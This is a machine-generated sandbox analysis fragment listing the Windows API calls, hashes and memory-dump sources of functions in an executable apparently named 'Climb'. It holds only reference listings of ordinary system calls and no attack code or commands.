                                                                                                                                                                          • Opcode ID: 9c2c3bbc299b734b9da44f283fb7cbfae74985463621189902765cfa1faa1e40
                                                                                                                                                                          • Instruction ID: 55ce7ca9f9ac89065be5f693190e228c45c7df54a57c417b07d67fc93e9b36d4
                                                                                                                                                                          • Opcode Fuzzy Hash: 9c2c3bbc299b734b9da44f283fb7cbfae74985463621189902765cfa1faa1e40
                                                                                                                                                                          • Instruction Fuzzy Hash: 40B1D231604340AFD324EF65C885F2ABBF9AF84358F54895CF45A4B2A2DB31ED46CB91
                                                                                                                                                                          APIs
                                                                                                                                                                          • __allrem.LIBCMT ref: 00A9042A
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A90446
                                                                                                                                                                          • __allrem.LIBCMT ref: 00A9045D
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A9047B
                                                                                                                                                                          • __allrem.LIBCMT ref: 00A90492
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A904B0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1992179935-0
                                                                                                                                                                          • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                          • Instruction ID: add304ba57075456885094d07edb816f4208247daac325f02c7c2e6f49b11d0f
                                                                                                                                                                          • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                          • Instruction Fuzzy Hash: B181E872700706AFDF20AF69DD81FAB73E8AF557A4F24412AF511DB681EB70D9008754
                                                                                                                                                                          APIs
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00A88649,00A88649,?,?,?,00A967C2,00000001,00000001,8BE85006), ref: 00A965CB
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00A967C2,00000001,00000001,8BE85006,?,?,?), ref: 00A96651
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00A9674B
                                                                                                                                                                          • __freea.LIBCMT ref: 00A96758
                                                                                                                                                                            • Part of subcall function 00A93B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A86A79,?,0000015D,?,?,?,?,00A885B0,000000FF,00000000,?,?), ref: 00A93BC5
                                                                                                                                                                          • __freea.LIBCMT ref: 00A96761
                                                                                                                                                                          • __freea.LIBCMT ref: 00A96786
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1414292761-0
                                                                                                                                                                          • Opcode ID: 2b9bb935b3d922e2ce1aa254b3d3c62297c560e4726f2359759129e780f06c71
                                                                                                                                                                          • Instruction ID: 3fd767a6386cc2430118c6c47eb3458370648d87cd2e61be7c47eee26d4288b5
                                                                                                                                                                          • Opcode Fuzzy Hash: 2b9bb935b3d922e2ce1aa254b3d3c62297c560e4726f2359759129e780f06c71
                                                                                                                                                                          • Instruction Fuzzy Hash: 2C51DD72B00206ABEF258FA4CD81FBB77EAEF40754B154669F918D6140EB34DC5096A0
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333
                                                                                                                                                                            • Part of subcall function 00AED3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AEC10E,?,?), ref: 00AED415
                                                                                                                                                                            • Part of subcall function 00AED3F8: _wcslen.LIBCMT ref: 00AED451
                                                                                                                                                                            • Part of subcall function 00AED3F8: _wcslen.LIBCMT ref: 00AED4C8
                                                                                                                                                                            • Part of subcall function 00AED3F8: _wcslen.LIBCMT ref: 00AED4FE
                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AEC72A
                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AEC785
                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00AEC7CA
                                                                                                                                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00AEC7F9
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00AEC853
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00AEC85F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1120388591-0
                                                                                                                                                                          • Opcode ID: 60ddaa8c3713a185e46d4926811cc7abcc26818e438ac534ce7d15b32bf6caa0
                                                                                                                                                                          • Instruction ID: 49f7a8371bb46b1cdfea50ff9934c6eff45a4c6eee4d54cd9428fe87a5c281fe
                                                                                                                                                                          • Opcode Fuzzy Hash: 60ddaa8c3713a185e46d4926811cc7abcc26818e438ac534ce7d15b32bf6caa0
                                                                                                                                                                          • Instruction Fuzzy Hash: B781AF71208281AFC715DF25C985E2ABBF5FF84318F14855CF45A8B2A2DB31ED46CB91
                                                                                                                                                                          APIs
                                                                                                                                                                          • VariantInit.OLEAUT32(00000035), ref: 00AC00A9
                                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00AC0150
                                                                                                                                                                          • VariantCopy.OLEAUT32(00AC0354,00000000), ref: 00AC0179
                                                                                                                                                                          • VariantClear.OLEAUT32(00AC0354), ref: 00AC019D
                                                                                                                                                                          • VariantCopy.OLEAUT32(00AC0354,00000000), ref: 00AC01A1
                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00AC01AB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3859894641-0
                                                                                                                                                                          • Opcode ID: 0395d0e2009f445378966166510003d21580496842b4d1e031831263255de0ea
                                                                                                                                                                          • Instruction ID: 722f12193dc1088775ad1357d26fa801f80d076f760536f626057f939ae7d450
                                                                                                                                                                          • Opcode Fuzzy Hash: 0395d0e2009f445378966166510003d21580496842b4d1e031831263255de0ea
                                                                                                                                                                          • Instruction Fuzzy Hash: 4651D635600310EACF20AFA49889F69B3B5EF55321F25944FEA06DF296DB709C44CB56
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A641EA: _wcslen.LIBCMT ref: 00A641EF
                                                                                                                                                                            • Part of subcall function 00A68577: _wcslen.LIBCMT ref: 00A6858A
                                                                                                                                                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 00AD9F2A
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AD9F4B
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AD9F72
                                                                                                                                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00AD9FCA
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                                          • String ID: X
                                                                                                                                                                          • API String ID: 83654149-3081909835
                                                                                                                                                                          • Opcode ID: 99ed426b89f562f71e168d113273390f9a64aea2f75437661e1db158b7ada0ce
                                                                                                                                                                          • Instruction ID: a670fba0e5552864793d128426a14d69dbb50e9d19aaebd7c1780a5620adb79e
                                                                                                                                                                          • Opcode Fuzzy Hash: 99ed426b89f562f71e168d113273390f9a64aea2f75437661e1db158b7ada0ce
                                                                                                                                                                          • Instruction Fuzzy Hash: 5EE170716043409FD724EF24C981A6AB7F5BF88314F04896DF89A9B3A2DB31DD45CB92
                                                                                                                                                                          APIs
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AD6F21
                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00AD707E
                                                                                                                                                                          • CoCreateInstance.OLE32(00B00CC4,00000000,00000001,00B00B34,?), ref: 00AD7095
                                                                                                                                                                          • CoUninitialize.OLE32 ref: 00AD7319
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                          • String ID: .lnk
                                                                                                                                                                          • API String ID: 886957087-24824748
                                                                                                                                                                          • Opcode ID: 44b99f77704a58b96b489ebf6aa6aa02d287944a80717132d3d44ef254605a87
                                                                                                                                                                          • Instruction ID: c4fafa83f38e77156ba4c904b6347f15d8ee041d6a64a4727f7e650dbc9bf674
                                                                                                                                                                          • Opcode Fuzzy Hash: 44b99f77704a58b96b489ebf6aa6aa02d287944a80717132d3d44ef254605a87
                                                                                                                                                                          • Instruction Fuzzy Hash: EAD12871508201AFC304EF64C981E6BB7E8FF98744F40496DF5968B2A2EB71ED45CB92
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A6249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A624B0
                                                                                                                                                                          • BeginPaint.USER32(?,?,?), ref: 00A61B35
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00A61B99
                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00A61BB6
                                                                                                                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00A61BC7
                                                                                                                                                                          • EndPaint.USER32(?,?,?,?,?), ref: 00A61C15
                                                                                                                                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00AA3287
                                                                                                                                                                            • Part of subcall function 00A61C2D: BeginPath.GDI32(00000000), ref: 00A61C4B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3050599898-0
                                                                                                                                                                          • Opcode ID: f513d1c0ecf0087811b862d34e83dd64272e5eb0780986d57e3db517389ac4ab
                                                                                                                                                                          • Instruction ID: 7685e6c11e40983a736fc214b2b8ef36ba7a2654819a140790dfc3a42570fd07
                                                                                                                                                                          • Opcode Fuzzy Hash: f513d1c0ecf0087811b862d34e83dd64272e5eb0780986d57e3db517389ac4ab
                                                                                                                                                                          • Instruction Fuzzy Hash: 0D41D171104300AFDB21DF64DC85FBA7BB8EF56320F140669FA648B2A1C7319945DB62
                                                                                                                                                                          APIs
                                                                                                                                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 00AD11B3
                                                                                                                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00AD11EE
                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00AD120A
                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00AD1283
                                                                                                                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00AD129A
                                                                                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00AD12C8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3368777196-0
                                                                                                                                                                          • Opcode ID: 3d48ddb05fb5f5e2191690460ac0fc14b775deac72f24f61e521007c435480cb
                                                                                                                                                                          • Instruction ID: ccbb18c867fde3d949633933df2ee31c0c699458fd9efc530cf1601d255df2e9
                                                                                                                                                                          • Opcode Fuzzy Hash: 3d48ddb05fb5f5e2191690460ac0fc14b775deac72f24f61e521007c435480cb
                                                                                                                                                                          • Instruction Fuzzy Hash: CF415C71A00204EFDF05EF94DD85AAAB7B9FF04310F1441A9ED019B296DB30DE66DBA4
                                                                                                                                                                          APIs
                                                                                                                                                                          • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00ABFBEF,00000000,?,?,00000000,?,00AA39E2,00000004,00000000,00000000), ref: 00AF8CA7
                                                                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00AF8CCD
                                                                                                                                                                          • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00AF8D2C
                                                                                                                                                                          • ShowWindow.USER32(00000000,00000004), ref: 00AF8D40
                                                                                                                                                                          • EnableWindow.USER32(00000000,00000001), ref: 00AF8D66
                                                                                                                                                                          • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00AF8D8A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 642888154-0
                                                                                                                                                                          • Opcode ID: 0ff95b9349b0a97f6326e2754301b4d9bc2e7832cdb4e6d41cde6f41b0ea8295
                                                                                                                                                                          • Instruction ID: e14e470393b15670f8a7538863983debfb11fb784c8aa28edf5b719cd7056d56
                                                                                                                                                                          • Opcode Fuzzy Hash: 0ff95b9349b0a97f6326e2754301b4d9bc2e7832cdb4e6d41cde6f41b0ea8295
                                                                                                                                                                          • Instruction Fuzzy Hash: 94419630601248EFDB25DFA4C989BB57BF1FF45314F2441A9F6184B2A2CB396856CB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetForegroundWindow.USER32(?,?,00000000), ref: 00AE2D45
                                                                                                                                                                            • Part of subcall function 00ADEF33: GetWindowRect.USER32(?,?), ref: 00ADEF4B
                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 00AE2D6F
                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 00AE2D76
                                                                                                                                                                          • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00AE2DB2
                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00AE2DDE
                                                                                                                                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00AE2E3C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2387181109-0
                                                                                                                                                                          • Opcode ID: cb9015be1eb566f9db81ac42c50bf3fdf29225311f35091ae619550d51f8086d
                                                                                                                                                                          • Instruction ID: 2606114abb0934f4ac6e5740f6aa44076bd945aeab6ea79bfd2cd258ea9964d8
                                                                                                                                                                          • Opcode Fuzzy Hash: cb9015be1eb566f9db81ac42c50bf3fdf29225311f35091ae619550d51f8086d
                                                                                                                                                                          • Instruction Fuzzy Hash: 4C31D072505355AFC721DF55CC45FABB7AAFBC4314F00091AF585D7181DA30E909CB92
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 00AC55F9
                                                                                                                                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00AC5616
                                                                                                                                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00AC564E
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AC566C
                                                                                                                                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00AC5674
                                                                                                                                                                          • _wcsstr.LIBVCRUNTIME ref: 00AC567E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 72514467-0
                                                                                                                                                                          • Opcode ID: 212d7ecaefac43dd4fdf281c7b9076d89ed8fb5e501427002bebdf0b2328b32a
                                                                                                                                                                          • Instruction ID: 85cfda44b61e373da8f33cbbc612c7975ec9b7ad566593ae1665a0e49dd81f8e
                                                                                                                                                                          • Opcode Fuzzy Hash: 212d7ecaefac43dd4fdf281c7b9076d89ed8fb5e501427002bebdf0b2328b32a
                                                                                                                                                                          • Instruction Fuzzy Hash: B7214632A04600BBEB16AB74DC49F7BBBA9DF45720F09402DF805CA091EB70EC81D760
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A65851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A655D1,?,?,00AA4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00A65871
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AD62C0
                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00AD63DA
                                                                                                                                                                          • CoCreateInstance.OLE32(00B00CC4,00000000,00000001,00B00B34,?), ref: 00AD63F3
                                                                                                                                                                          • CoUninitialize.OLE32 ref: 00AD6411
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                          • String ID: .lnk
                                                                                                                                                                          • API String ID: 3172280962-24824748
                                                                                                                                                                          • Opcode ID: 2acaa7e995a91b115e7af18b327006b4cb8f3ceb66205cccf7ab0a4f05068561
                                                                                                                                                                          • Instruction ID: a1d39675f5b53b5ec79611293eb83e4c0e26b918a396ecd4ade849c20dd1e001
                                                                                                                                                                          • Opcode Fuzzy Hash: 2acaa7e995a91b115e7af18b327006b4cb8f3ceb66205cccf7ab0a4f05068561
                                                                                                                                                                          • Instruction Fuzzy Hash: E5D13475A042019FC714DF28C584A2ABBF5FF89714F14895EF8869B361DB31EC45CB92
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00AF8740
                                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00AF8765
                                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00AF877D
                                                                                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 00AF87A6
                                                                                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00ADC1F2,00000000), ref: 00AF87C6
                                                                                                                                                                            • Part of subcall function 00A6249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A624B0
